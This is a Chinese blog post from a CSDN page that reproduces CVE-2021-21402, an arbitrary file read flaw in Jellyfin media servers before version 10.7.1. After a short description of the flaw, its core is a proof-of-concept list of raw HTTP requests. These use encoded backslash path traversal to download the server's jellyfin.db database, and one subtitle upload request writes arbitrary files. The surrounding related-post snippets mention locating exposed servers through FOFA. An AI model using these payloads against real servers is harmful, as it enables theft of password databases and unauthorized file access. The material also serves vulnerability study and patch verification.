jellyfin任意文件读取漏洞CVE-2021-21402

最新推荐文章于 2023-03-16 14:20:33 发布
最新推荐文章于 2023-03-16 14:20:33 发布
阅读量402 收藏
点赞数
分类专栏: 漏洞分析&复现 文章标签: 服务器 运维
原文链接:https://blog.csdn.net/wuguojiuai/article/details/116026280?spm=1001.2014.3001.5502
版权

目录

简介:

复现:

web安全学习了解: web渗透测试      
官网: 宣紫科技      

简介:

Jellyfin 是一个免费软件媒体系统。在 10.7.1 版之前的 Jellyfin 中,带有某些终结点的精心设计的请求将允许从 Jellyfin 服务器的文件系统中读取任意文件。当 Windows 用作主机 OS 时,此问题更加普遍。暴露于公共 Internet 的服务器可能会受到威胁。在版本 10.7.1

中已修复此问题。解决方法是,用户可以通过在文件系统上实施严格的安全权限来限制某些 访问,但是建议尽快进行更新。

影响版本:

Jellyfin<10.7.1

复现:


Poc GET /Audio/anything/hls/..%5Cdata%5Cjellyfin.db/stream.mp3/ HTTP/1.1 

GET /Videos/anything/hls/m/..%5Cdata%5Cjellyfin.db HTTP/1.1 

GET /Videos/anything/hls/..%5Cdata%5Cjellyfin.db/stream.m3u8/?api_key=4c5750626 da14b0a804977b09bf3d8f7 HTTP/1.1 

GET /Images/Ratings/c:%5ctemp/filename HTTP/1.1

GET /Images/Ratings/..%5c..%5 c..%5c..%5c..%5c..%5c..%5c..%5c..%5ctemp/filename HTTP/1.1 

POST /Videos/d7634eb0064cce760f3f0bf8282c16cd/Subtitles HTTP/1.1 
... 
X-Emby-Authorization: MediaBrowser DeviceId="...", Version="10.7.0", Token="... "
... 
{"language":".\\..\\","format":".\\..\\test.bin","isForced":false,"data":"base6 4 encoded data"}

宣紫科技
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CVE-2021-21402-Jellyfin:jiaocollCVE-2021-21402-果冻
04-09
CVE-2021-21402-Jellyfin-任意文件读取 此POC仅用于学习交流,由此产生的一切后果本人不承担
OpenSSH 资源管理错误漏洞(CVE-2021-28041)
06-22
OpenSSH 资源管理错误漏洞(CVE-2021-28041)
CVE-2021-25646-Apache Druid漏洞POC.py
02-26
CVE-2021-25646-Apache Druid漏洞POC.py
vlc.m3u 媒体中心Jellyfin kodi 机顶盒 vlc等使用
05-21
截止2020年5月21日,该文件可以使用vlc、Jellyfin等播放,支持4K电视直播。由于该文件会存在时效性,请谨慎下载使用!
CVE-2021-21975:Nmap脚本检查漏洞CVE-2021-21975
04-06
CVE-2021-21975 Nmap脚本检查漏洞CVE-2021-21975 漏洞参考: 博客 例子 nmap -p443 --script cve-2021-21975.nse --script-args vulns.showall IP
jellyfin_10.7.5_windows
05-24
jellyfin_10.7.5_windows-x64.exe
64位Win10 Modelsim破解及证书LICENSE.TXT无法生成解决方法
热门推荐
DavidEnterpriseStar的博客
10-19 1万+
将patch_dll.bat和MentorKG.exe放到安装目录的win64目录下 安装时一路点YES,可以不用重启。 方法1:找到安装目录下win64的mgls64.dll,取消只读           打开cmd(快捷键:super+R,输入cmd)           输入E:(安装磁盘)回车           输入cd  :/Modelsim/win64(安装目录中的wi
CVE-2021-21402漏洞复现Jellyfin任意文件读取
weixin_52834047的博客
05-10 2048
1.漏洞描述 Jellyfin是一个自由软件媒体系统,在10.7.1版之前的Jellyfin中,攻击者可以通过精心构造的请求读取Jellyfin服务器端的任意文件,当使用Windows主机作为操作系统时,此问题将变得跟加普遍,该漏洞已在10.7.1版本中修复。 2.影响版本 Jellyfin<10.7.1 3.复现步骤 1.根据关键词在fofa上搜索包含该漏洞的网站 2.访问网站用burpsuite抓包 3.构造URL请求头 jellyfin.db将从服务器下载带有密码的...
[ 漏洞复现篇 ]Jellyfin 未授权任意文件读取 CVE-2021-21402
qq_51577576的博客
05-31 2573
🍬博主介绍 👨‍🎓 博主介绍:大家好,我是_PowerShell,很高兴认识大家~ ✨主攻领域:【渗透领域】【数据通信】【通讯安全】【web安全】【面试分析】 🎉点赞➕评论➕收藏 == 养成习惯(一键三连)😋 🎉欢迎关注💗一起学习👍一起讨论⭐️一起进步📝文末有彩蛋 🙏作者水平有限,欢迎各位大佬指点,相互学习进步! 目录 🍬博主介绍 一、漏洞简介 二、漏洞编号(选填) 三、漏洞靶场(选填) 四、漏洞影响版本(必填) 五、FOFA Dork/Google Dork(选填) 六、漏洞...
关于CVE-2023-27161 Jellyfin流媒体系统存在SSRF漏洞的学习
weixin_48421613的博客
03-16 846
Jellyfin 直到 v10.7.7 通过组件 /Repository 包含服务器端请求伪造 (SSRF)。
jellyfin-audio-player:Jellyfin的独立音乐流应用程序
02-12
Jellyfin音频播放器 这是一个基于的音频流应用程序。 Jellyfin是基于社区的软件,可让您通过Internet流式传输媒体库。 通过React Native,Jellyfin Audio Player允许您流Jellyfin音乐库,并完全支持背景音频和投射(即Airplay和Chromecast)。 :exclamation_mark: 现在开放在iOS上进行Beta测试 请点击此链接注册Jellyfin Audio Player的TestFlight beta版本: ://testflight.apple.com/join/cf2AMDpx。 产品特点 按最近相册排序 浏览所有可用专辑 根据专辑和歌手姓名进行搜索 排队曲目和专辑 AirPlay和Chromecast支持 背景音频 本机黑暗模式 正在考虑的功能 下载音乐以进行离线播放 根据曲目名称搜索 循环和混排队列 入门 该软件为Alpha版。 我正在
gelli:Jellyfin的本地音乐播放器
03-21
格里 这是用于连接Jellyfin媒体服务器的Android设备的本地音乐播放器。该代码基于一个相对较新的Phonograph版本,并且仅供个人使用,但是欢迎您提供帮助!在提交拉取请求之前,请打开一个问题以讨论较大的更改。如果有任何平面设计师有好的建议,我愿意接受改进的图标。 特征 基本库导航 无间隙播放 按不同领域对专辑和歌曲进行排序 搜索媒体以查找部分匹配项 媒体服务与通知集成 收藏夹和播放列表 按库过滤内容 问题 由于这是一个主要为自己准备的小项目,所以有些事情我还没有解决。我将不胜感激拉取请求以解决这些问题中的任何一个! 无法通过API进行艺术家排序 更改后,播放列表和收藏夹不会自动更新 批量操作尚不起作用 未来的计划 如果我有时间的话,这些就是我可能会包括的一些内容。 接口检修 最近缓存 离线下载 同步播放 智能播放列表 会话控制 这些是我自己不会包括的功能,但是我会接受带有良好
jellyamp:桌面客户端,用于从Jellyfin服务器收听音乐
02-04
Jellyamp:Jellyfin的桌面音乐播放器 关于 一个时尚的跨平台桌面客户端,用于从Jellyfin服务器听音乐。 受Plexamp启发。 行动中 登录:服务器设置 登录:用户认证 浏览音乐 艺术家页面 播放器 队列页面
CVE-2021-21972:CVE-2021-21972漏洞利用
03-04
CVE-2021-21972 CVE-2021-21972工作于VMware-VCSA-all-6.7.0-8217866,VMware-VIM-all-6.7.0-8217866 :heavy_check_mark: VMware-VCSA-all-6.5.0-16613358 :heavy_check_mark:对于vCenter6.7 U2 + vCenter 6.7U2 +在...
Windows Shell远程执行代码漏洞((CVE-2018-8414)复现
weixin_30813225的博客
09-13 921
0x00 SettingContent-ms文件介绍 .SettingContent-ms是在Windows 10中引入的一种文件类型,它的内容是XML格式进行编写的,主要用于创建Windows设置页面的快捷方式.Windows 10下行.SettingContent-ms后缀的文件,系统并未判断该类文件所在的路径是否在控制面板相关目录下,便直接执行了文件中用于控制面板设置相关...
elasticsearch集群未授权访问漏洞,设置用户登录认证
Jun_ming的博客
05-29 1369
原有ES集群配置用户认证 ES安装步骤省略 1.节点上生成认证文件 ca证书 [elasticsearch@pgdb-es1 bin]$ [elasticsearch@pgdb-es1 bin]$ ./elasticsearch-certutil ca WARNING: An illegal reflective access operation has occurred WARNING: Illegal reflective access by org.bouncycastle.jcajce.
6.0反序列化漏洞分析
kali_Ma的博客
11-02 776
Thinkphp 6.0 反序列化漏洞分析 ThinkPHP目录结构: project 应用部署目录 ├─application 应用目录(可设置) │ ├─common 公共模块目录(可更改) │ ├─index 模块目录(可更改) │ │ ├─config.php 模块配置文件 │ │ ├─common.php 模块函数文件 │ │ ├─controller 控制器目录 │ │ ├
jenkins漏洞安全漏洞CVE-2022-2048和CVE-2021-28169
最新发布
05-20
CVE-2021-28169是Jenkins中的另一个安全漏洞,存在于Jenkins的Windows安装程序中。攻击者可以利用该漏洞在Jenkins服务器上执行任意代码,甚至获取管理员权限。该漏洞的CVSS评分为9.8(最高10分),属于严重级别。 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值